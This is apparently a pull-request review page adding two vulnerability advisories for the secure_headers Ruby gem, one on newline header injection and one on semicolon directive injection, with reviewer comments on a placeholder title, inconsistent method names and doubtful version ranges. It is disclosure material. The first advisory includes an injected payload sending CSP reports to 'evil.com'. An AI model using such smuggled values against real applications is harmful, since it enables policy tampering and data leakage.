@@ -0,0 +1,52 @@ | ||
--- | ||
gem: secure_headers | ||
cve: 2020-5216 | ||
ghsa: w978-rmpf-qmwg | ||
url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg | ||
date: 2020-01-23 | ||
title: secure_headers header injection due to newline | ||
description: |- | ||
If user-supplied input was passed into append/override_content_security_policy_directives, | ||
a newline could be injected leading to limited header injection. | ||
Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy | ||
header with the remaining value of the original string. It will continue to create new headers | ||
for each newline. | ||
e.g. | ||
``` | ||
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"]) | ||
``` | ||
would result in | ||
``` | ||
Content-Security-Policy: ... script-src: mycdn.com | ||
Content-Security-Policy: injected | ||
Content-Security-Policy: rest-of-the-header | ||
``` | ||
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: | ||
``` | ||
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) | ||
``` | ||
``` | ||
Content-Security-Policy: ... script-src: mycdn.com | ||
Content-Security-Policy: default-src 'none'; report-uri evil.com | ||
Content-Security-Policy: rest-of-the-header | ||
``` | ||
Workarounds | ||
``` | ||
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) | ||
``` | ||
cvss_v3: 4.4 | ||
patched_versions: | ||
- "~> 3.9.0" | ||
- "~> 5.2.0" | ||
- ">= 6.3.0" |
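Review bot: the two example calls in the description (`override_content_security_directives(script_src: [...])`) drop `_policy` from the method named in the first sentence and in the workaround (`override_content_security_policy_directives`), and the workaround passes `(:frame_src, [...])` where the examples pass a `script_src:` keyword hash, so a reader cannot tell which spelling or call form is the real API; suggest one name and one call form throughout. Two smaller points: the bare `Workarounds` line should be the `# Workarounds` heading the companion advisory uses, and the rendered headers `Content-Security-Policy: ... script-src: mycdn.com` carry a stray colon after `script-src` (a CSP directive name is separated from its value by a space, not a colon).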
@@ -0,0 +1,42 @@ | ||
--- | ||
gem: secure_headers | ||
cve: 2020-5217 | ||
ghsa: xq52-rv6w-397c | ||
url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c | ||
date: 2020-01-23 | ||
title: secure_headers XXX | ||
description: |- | ||
If user-supplied input was passed into append/override_content_security_policy_directives, | ||
a semicolon could be injected leading to directive injection. | ||
This could be used to e.g. override a script-src directive. Duplicate directives are ignored | ||
and the first one wins. The directives in secure_headers are sorted alphabetically so they | ||
pretty much all come before script-src. A previously undefined directive would receive a value | ||
even if SecureHeaders::OPT_OUT was supplied. | ||
The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning | ||
when this happens. This will result in innocuous browser console messages if being | ||
exploited/accidentally used. In future releases, we will raise application errors resulting in | ||
500s. | ||
> Duplicate script-src directives detected. All but the first instance will be ignored. | ||
See https://www.w3.org/TR/CSP3/#parse-serialized-policy | ||
> Note: In this case, the user agent SHOULD notify developers that a duplicate directive was | ||
> ignored. A console warning might be appropriate, for example. | ||
# Workarounds | ||
If you are passing user input into the above methods, you could filter out the input: | ||
``` | ||
override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")]) | ||
``` | ||
cvss_v3: 4.4 | ||
patched_versions: | ||
- "~> 3.8.0" | ||
- "~> 5.1.0" | ||
reedloden (Author, Member)
- ">= 6.2.0" |
I think this version specifier is not correct - it suggests 5.2.0 is vulnerable. Would `~> 5.1` be right?
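Review bot: `title: secure_headers XXX` is a placeholder that made it into the commit; the description already names the issue (a semicolon leading to directive injection), so suggest a title in the style of the companion entry, e.g. `secure_headers directive injection due to semicolon`. The `patched_versions` concern raised in the comment above also applies to `"~> 3.8.0"`: the first advisory on this page lists `"~> 3.9.0"` as patched, so a 3.9.x release exists and would be reported as unpatched by this entry, just as 5.2.x would under `"~> 5.1.0"`; suggest `~> 3.8` and `~> 5.1` so each range covers its whole major series up to `>= 6.2.0`.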